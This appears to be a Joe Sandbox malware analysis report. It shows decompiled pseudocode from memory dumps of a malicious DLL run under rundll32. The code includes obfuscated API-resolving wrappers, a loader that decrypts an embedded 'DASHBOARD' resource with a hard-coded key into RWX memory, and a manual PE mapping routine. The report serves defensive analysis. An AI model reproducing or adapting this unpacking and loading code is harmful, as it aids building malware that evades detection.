Memory Dump Source

Source File: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000A.00000002.511823040.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.511844783.0000000000203000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
Instruction ID: 62e7bf02314506972b8c60d171bc7ed2566797cd3e5d73733493104d5b6df78f
Opcode Fuzzy Hash: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
Instruction Fuzzy Hash: 50014876901208FBEB05DFD4DC0A8EE7BB5EF45354F208089F90856211D7B29F20AB91

Uniqueness

Uniqueness Score: -1.00%

Function 001F46BB Relevance: 1.5, APIs: 1, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E001F46BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;

				E001F20B9(_t21);
				_v20 = 0x3f5bb0;
				_v16 = 0;
				_v12 = 0x996874;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0xb43bad9d;
				_v8 = 0xebf0af;
				_v8 = _v8 ^ 0x3b7dcb24;
				_v8 = _v8 ^ 0x3b96d1fd;
				_t25 = E001FAA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
				return _t26;
			}

0x001f46d5
0x001f46da
0x001f46e4
0x001f46ec
0x001f46f3
0x001f46f7
0x001f46fe
0x001f4705
0x001f470c
0x001f4724
0x001f4735
0x001f473b

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 001F4735

Memory Dump Source

Source File: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000A.00000002.511823040.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.511844783.0000000000203000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
Instruction ID: 32d34307c457cc00b7fbf07909abdbe3027a643f51d24fdff6ba212af39a835b
Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
Instruction Fuzzy Hash: 8D01DA7580121CBBCF15AFD5DC498EFBFB8EF45394F108145F91866211D2758A60DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 001E93ED Relevance: 1.5, APIs: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E001E93ED() {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _t24;

				_v28 = 0xda6c64;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x88a564;
				_v12 = _v12 | 0x9bf5ed5c;
				_v12 = _v12 ^ 0x9bf17c37;
				_v8 = 0xd9241f;
				_v8 = _v8 * 0x5c;
				_v8 = _v8 + 0xccdd;
				_v8 = _v8 + 0x903;
				_v8 = _v8 ^ 0x4e0c4bb2;
				E001FAA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
				ExitProcess(0);
			}

0x001e93f3
0x001e9405
0x001e9411
0x001e9412
0x001e9413
0x001e941a
0x001e9421
0x001e9428
0x001e9433
0x001e9436
0x001e943d
0x001e9444
0x001e9451
0x001e945b

APIs

ExitProcess.KERNEL32(00000000), ref: 001E945B

Memory Dump Source

Source File: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000A.00000002.511823040.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.511844783.0000000000203000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
Instruction ID: 7c842011c1c83e3a1489926a0ec3122bbe53a2293494023ec133686fe0a2282b
Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
Instruction Fuzzy Hash: B9F03C7190130CFBEB04DBE8DA469ADFBB4EB50314F2081A9D608B3261E7B45F459A91

Uniqueness

Uniqueness Score: -1.00%

Function 001F8F9E Relevance: 1.5, APIs: 1, Instructions: 31
serviceCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E001F8F9E(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				unsigned int _v8;
				unsigned int _v12;
				void* _t19;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001F20B9(_t19);
				_v12 = 0xd87912;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0006adfb;
				_v8 = 0xf5ad8e;
				_v8 = _v8 + 0xc481;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x00032ff7;
				E001FAA30(0x26e, 0x20a9b263, __ecx, 0x37d4b579);
				_t24 = CloseServiceHandle(_a12); // executed
				return _t24;
			}

0x001f8fa1
0x001f8fa2
0x001f8fa3
0x001f8fa6
0x001f8fa9
0x001f8fad
0x001f8fae
0x001f8fb3
0x001f8fbd
0x001f8fc6
0x001f8fcd
0x001f8fd4
0x001f8fdb
0x001f8fdf
0x001f8ff7
0x001f9002
0x001f9007

APIs

CloseServiceHandle.ADVAPI32(33E0711C), ref: 001F9002

Memory Dump Source

Source File: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000A.00000002.511823040.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.511844783.0000000000203000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
Instruction ID: f83d8d32ace20e3d5dff22d7a789328ff680158ddee1bbbd75b4140a5821e577
Opcode Fuzzy Hash: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
Instruction Fuzzy Hash: 32F0FFB591120CFFDF05AFD4C9468AEBBB4EB14308F104198F90552611D7769B64EF51

Uniqueness

Uniqueness Score: -1.00%

Function 001F1F8A Relevance: 1.5, APIs: 1, Instructions: 31
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E001F1F8A(intOrPtr __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t19;
				int _t25;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001F20B9(_t19);
				_v12 = 0x96b134;
				_v12 = _v12 + 0xdeb4;
				_v12 = _v12 | 0x0c5d8169;
				_v12 = _v12 ^ 0x0cdc4dba;
				_v8 = 0xf8ae2a;
				_v8 = _v8 + 0xcab3;
				_v8 = _v8 * 0x2b;
				_v8 = _v8 ^ 0x29e0cf29;
				E001FAA30(0x112, 0x9df7cc0d, __ecx, 0x6fe24f6c);
				_t25 = DeleteFileW(_a4); // executed
				return _t25;
			}

0x001f1f8d
0x001f1f8e
0x001f1f8f
0x001f1f93
0x001f1f94
0x001f1f99
0x001f1fa3
0x001f1faf
0x001f1fb6
0x001f1fbd
0x001f1fc4
0x001f1fda
0x001f1fdd
0x001f1fea
0x001f1ff5
0x001f1ffa

APIs

DeleteFileW.KERNEL32(0CDC4DBA,?,?,?,?), ref: 001F1FF5

Memory Dump Source

Source File: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000A.00000002.511823040.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.511844783.0000000000203000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
Instruction ID: d41894b92516d7629ab8f5b0ff03774f109bc11e77133142b48f6d27f0cbd6a6
Opcode Fuzzy Hash: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
Instruction Fuzzy Hash: 79F0F9B190120CFBDF18EFD4D9468AEBFB5EB50304F208199F40467222E7715F589B91

Uniqueness

Uniqueness Score: -1.00%

Function 001F5BFD Relevance: 1.5, APIs: 1, Instructions: 31
libraryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E001F5BFD(intOrPtr __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t20;
				struct HINSTANCE__* _t25;

				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001F20B9(_t20);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x5faaf9;
				_v20 = 0xab22cd;
				_v12 = 0x8e3542;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x00089943;
				_v8 = 0x9b967a;
				_v8 = _v8 ^ 0x4689732a;
				_v8 = _v8 ^ 0x4619bdd7;
				E001FAA30(0x12d, 0x9df7cc0d, __ecx, 0xf5e9dd1e);
				_t25 = LoadLibraryW(_a8); // executed
				return _t25;
			}

0x001f5c03
0x001f5c06
0x001f5c0a
0x001f5c0b
0x001f5c10
0x001f5c17
0x001f5c23
0x001f5c2a
0x001f5c31
0x001f5c35
0x001f5c3c
0x001f5c43
0x001f5c4a
0x001f5c62
0x001f5c6d
0x001f5c72

APIs

LoadLibraryW.KERNEL32(00000000), ref: 001F5C6D

Memory Dump Source

Source File: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000A.00000002.511823040.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.511844783.0000000000203000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
Instruction ID: c0b97209230188f1830cc80c0af02d29d2316416116616fcfa10d7a9649359e0
Opcode Fuzzy Hash: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
Instruction Fuzzy Hash: F4F0FFB5C0020CFBCF04EFE4DA06AEEBBB4FB50318F508188E91566212D3B54B58DB91

Uniqueness

Uniqueness Score: -1.00%

Function 001EB23C Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E001EB23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				int _t32;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001F20B9(_t27);
				_v12 = 0x6268;
				_v12 = _v12 ^ 0x57e834c3;
				_v12 = _v12 + 0xffff2919;
				_v12 = _v12 + 0xffff3e3d;
				_v12 = _v12 ^ 0x57e9dc2b;
				_v8 = 0xa46433;
				_v8 = _v8 + 0x98ba;
				_v8 = _v8 | 0xc390ebe9;
				_v8 = _v8 + 0xd5b0;
				_v8 = _v8 ^ 0xc3bab866;
				E001FAA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
				_t32 = lstrcmpiW(_a16, _a4); // executed
				return _t32;
			}

0x001eb23f
0x001eb240
0x001eb241
0x001eb244
0x001eb247
0x001eb24a
0x001eb24e
0x001eb24f
0x001eb254
0x001eb25e
0x001eb26a
0x001eb271
0x001eb278
0x001eb27f
0x001eb286
0x001eb28d
0x001eb294
0x001eb29b
0x001eb2b3
0x001eb2c1
0x001eb2c6

APIs

lstrcmpiW.KERNEL32(EE1E6DE5,57E9DC2B), ref: 001EB2C1

Memory Dump Source

Source File: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000A.00000002.511823040.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.511844783.0000000000203000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
Instruction ID: 157800e9f138c8f2779af32cec02d27de3dd18023e831e8675e6d1967ad4183e
Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
Instruction Fuzzy Hash: F70148B2C00208FBDF41DFD4DD468AEBB71EB40300F108088B90562152E3724B609B51

Uniqueness

Uniqueness Score: -1.00%

Function 001F1E67 Relevance: 1.3, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E001F1E67(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t23;
				int _t29;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001F20B9(_t23);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x62b4e9;
				_v20 = 0xc383c4;
				_v12 = 0x238243;
				_v12 = _v12 * 0x67;
				_v12 = _v12 ^ 0x0e4d658b;
				_v8 = 0x6564d0;
				_v8 = _v8 ^ 0x2b193590;
				_v8 = _v8 << 0xd;
				_v8 = _v8 ^ 0x8a2acb03;
				E001FAA30(0x23f, 0x9df7cc0d, __ecx, 0x3185251c);
				_t29 = CloseHandle(_a12); // executed
				return _t29;
			}

0x001f1e6d
0x001f1e70
0x001f1e73
0x001f1e77
0x001f1e78
0x001f1e7d
0x001f1e84
0x001f1e90
0x001f1e97
0x001f1ead
0x001f1eb0
0x001f1eb7
0x001f1ebe
0x001f1ec5
0x001f1ec9
0x001f1ed6
0x001f1ee1
0x001f1ee6

APIs

CloseHandle.KERNEL32(00C383C4), ref: 001F1EE1

Memory Dump Source

Source File: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 0000000A.00000002.511823040.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.511844783.0000000000203000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
Instruction ID: e19f48a6b58f34dab8cb51a77727e3c5bd2f999bf68cb7cdf6d59e4efac02420
Opcode Fuzzy Hash: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
Instruction Fuzzy Hash: 6C0128B5C0020CFBCF40EFA4D94A9AEBFB5EB14304F508498E91567212D7758B24DF91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 1532, Parent PID: 2656COMMON

Execution Graph

Execution Coverage:	16.1%
Dynamic/Decrypted Code Coverage:	16.2%
Signature Coverage:	0%
Total number of Nodes:	297
Total number of Limit Nodes:	23

Executed Functions

Function 100125C0 Relevance: 45.7, APIs: 7, Strings: 19, Instructions: 165
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E100125C0(void* __ebx, void* __edi, void* __esi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				char _v40;
				void* _v44;
				void* _v48;
				long _v52;
				void* _v56;
				struct HRSRC__* _v60;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				short _v76;
				short _v78;
				short _v80;
				short _v82;
				short _v84;
				short _v86;
				char _v88;
				intOrPtr _v92;
				void* __ebp;
				signed int _t66;
				void* _t70;
				void* _t72;
				struct HRSRC__* _t74;
				void* _t78;
				intOrPtr _t92;
				void* _t93;
				void* _t95;
				intOrPtr _t104;
				signed int _t120;
				void* _t121;

				_t119 = __esi;
				_t118 = __edi;
				_t96 = __ebx;
				_t66 =  *0x100545cc; // 0x2c57fec8
				_v20 = _t66 ^ _t120;
				_v92 = _a8;
				 *0x10055a80 = _a4;
				_t109 = _a8;
				 *0x10055a84 = _a8;
				 *0x10055a88 = _a12;
				_v8 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v12 = 0;
				_t70 = E10006A90(__eflags); // executed
				_t131 = _t70;
				if(_t70 != 0) {
					_push(0x10046758);
					E1002FE65(__ebx, _t109, __edi, __esi, __eflags);
					_t72 = 0;
				} else {
					 *0x100530b8 = 0;
					 *0x100530bc = 0;
					 *0x100530c0 = 0;
					 *0x100530c8 = 0;
					 *0x100530c4 = 0;
					 *0x100530cc = 0;
					_v60 = 0;
					_v56 = 0;
					_t74 = FindResourceW(_a4, 0x1705, L"DASHBOARD"); // executed
					_v60 = _t74;
					_v56 = LoadResource(_a4, _v60);
					_v52 = SizeofResource(_a4, _v60);
					_v88 = 0x6b;
					_v86 = 0x65;
					_v84 = 0x72;
					_v82 = 0x6e;
					_v80 = 0x65;
					_v78 = 0x6c;
					_v76 = 0x33;
					_v74 = 0x32;
					_v72 = 0x2e;
					_v70 = 0x64;
					_v68 = 0x6c;
					_v66 = 0x6c;
					_v64 = 0;
					_v40 = 0x6e;
					_v38 = 0x74;
					_v36 = 0x64;
					_v34 = 0x6c;
					_v32 = 0x6c;
					_v30 = 0x2e;
					_v28 = 0x64;
					_v26 = 0x6c;
					_v24 = 0x6c;
					_v22 = 0;
					_t78 = E10006A90(_t131); // executed
					if(_t78 == 0) {
						_t45 =  &_v88; // 0x6b
						_t95 = E100048E0(_t45);
						_t121 = _t121 + 4;
						_v44 = _t95;
					}
					_t47 =  &_v40; // 0x6e
					_v48 = E100048E0(_t47);
					 *0x10055a7c = E100053D0(_v44, 0x6c705b40);
					 *0x10055a78 = E100053D0(_v44, 0x531ff383);
					_t133 =  *0x10055a78;
					if( *0x10055a78 == 0) {
						__eflags = 0x2000;
						_v12 = VirtualAlloc(0, _v52, 0x00002000 -  *0x100530cc | 0x00001000, 0x40);
					} else {
						_t93 =  *0x10055a78(0xffffffff, 0, _v52, 0x3000, 0x40, 0); // executed
						_v12 = _t93;
					}
					E1002FB00(_t96, _t118, _t119, _v12, _v56, _v52);
					_t104 =  *0x100530b4; // 0x2795
					_v16 = E1002F9A6(_t96, _v56, _t118, _t119, _t104);
					E10002970(_t133, _v16, "6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0", 0x24);
					_t109 = _v16;
					E10003EE0(_v16, _v12, _v52);
					_t92 = E100026A0(0x10055a64, _v12, _v52); // executed
					 *0x10055a8c = _t92;
					_t72 = 1;
				}
				return E1002F81E(_t72, _t96, _v20 ^ _t120, _t109, _t118, _t119);
			}

APIs

Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C

_printf.LIBCMT ref: 1001265F
FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
_malloc.LIBCMT ref: 100127F5

Strings

l, xrefs: 1001272D
n, xrefs: 100126C7
d, xrefs: 100126EB
., xrefs: 100126E5
ndldl, xrefs: 10012757, 1001275A
2, xrefs: 100126DF
e, xrefs: 100126CD
kre3.l, xrefs: 10012748, 1001274B
6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0, xrefs: 10012802
3, xrefs: 100126D9
l, xrefs: 100126D3
l, xrefs: 100126F1
l, xrefs: 10012715
l, xrefs: 10012733
l, xrefs: 100126F7
l, xrefs: 1001271B
., xrefs: 10012721
DASHBOARD, xrefs: 1001267C
d, xrefs: 10012727

Memory Dump Source

Source File: 0000000B.00000002.514931269.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.514920051.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515118189.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515134772.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515140995.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515147176.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
API String ID: 572389289-2839844625
Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 10002280 Relevance: 22.8, APIs: 15, Instructions: 331
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E10002280(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v8;
				void* _v12;
				signed short* _v16;
				void* _v20;
				void* _v24;
				long _v28;
				signed int _v32;
				intOrPtr _v64;
				char _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr* _v80;
				intOrPtr _v84;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _t180;
				void* _t191;
				void* _t198;
				void* _t202;
				intOrPtr _t209;
				void* _t220;
				intOrPtr _t269;
				intOrPtr _t278;
				intOrPtr _t326;

				_v100 = __ecx;
				_v72 = 0;
				_v20 = 0;
				if(E10001990(_v100, _a8, 0x40) != 0) {
					_v16 = _a4;
					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
						_t10 =  &(_v16[0x1e]); // 0xfffefe57
						if(E10001990(_v100, _a8,  *_t10 + 0xf8) != 0) {
							_t15 =  &(_v16[0x1e]); // 0xfffefe57
							_v80 = _a4 +  *_t15;
							if( *_v80 == 0x4550) {
								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
										_v32 =  *(_v80 + 0x38);
										_v12 = 0;
										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
											} else {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
											}
											if(_v88 > _v20) {
												_v20 = _v88;
											}
											_v12 = _v12 + 1;
											_v84 = _v84 + 0x28;
										}
										__imp__GetNativeSystemInfo( &_v68); // executed
										_t59 = _v64 - 1; // 0x71
										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _t59 &  !(_v64 - 1);
										_t65 = _v64 - 1; // -1
										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
											_t180 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
											_v24 = _t180;
											if(_v24 != 0) {
												L26:
												_v72 = HeapAlloc(GetProcessHeap(), 8, 0x34);
												if(_v72 != 0) {
													 *((intOrPtr*)(_v72 + 4)) = _v24;
													asm("sbb edx, edx");
													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
													if(E10001990(_v100, _a8,  *(_v80 + 0x54)) != 0) {
														_t191 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
														_v8 = _t191;
														E10001810(_v8, _v16,  *(_v80 + 0x54));
														_t115 =  &(_v16[0x1e]); // 0xfffefe57
														 *_v72 = _v8 +  *_t115;
														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
														_t198 = E100019C0(_v100, _a4, _a8, _v80, _v72); // executed
														if(_t198 != 0) {
															_t269 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
															_v76 = _t269;
															if(_t269 == 0) {
																 *((intOrPtr*)(_v72 + 0x18)) = 1;
															} else {
																 *((intOrPtr*)(_v72 + 0x18)) = E10001EB0(_v100, _v72, _v76);
															}
															if(E10001FF0(_v100, _v72) != 0) {
																_t202 = E10001CB0(_v100, _v72); // executed
																if(_t202 != 0) {
																	if(E10001E30(_v100, _v72) != 0) {
																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
																			 *(_v72 + 0x2c) = 0;
																			L49:
																			return _v72;
																		}
																		if( *(_v72 + 0x14) == 0) {
																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																			L47:
																			goto L49;
																		}
																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																		_t209 =  *0x10055a88; // 0x0
																		_t278 =  *0x10055a84; // 0x1
																		_t326 =  *0x10055a80; // 0x10000000
																		_v92 = _v96(_t326, _t278, _t209);
																		if(_v92 != 0) {
																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
																			goto L47;
																		}
																		SetLastError(0x45a);
																		L50:
																		E10002840(_v100, _v72);
																		return 0;
																	}
																	goto L50;
																}
																goto L50;
															}
															goto L50;
														}
														goto L50;
													}
													goto L50;
												}
												VirtualFree(_v24, 0, 0x8000);
												SetLastError(0xe);
												return 0;
											}
											_t220 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
											_v24 = _t220;
											if(_v24 != 0) {
												goto L26;
											}
											SetLastError(0xe);
											return 0;
										}
										SetLastError(0xc1);
										return 0;
									}
									SetLastError(0xc1);
									return 0;
								}
								SetLastError(0xc1);
								return 0;
							}
							SetLastError(0xc1);
							return 0;
						}
						return 0;
					}
					SetLastError(0xc1);
					return 0;
				}
				return 0;
			}

APIs

Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1

SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8

Memory Dump Source

Source File: 0000000B.00000002.514931269.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.514920051.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515118189.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515134772.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515140995.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515147176.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File

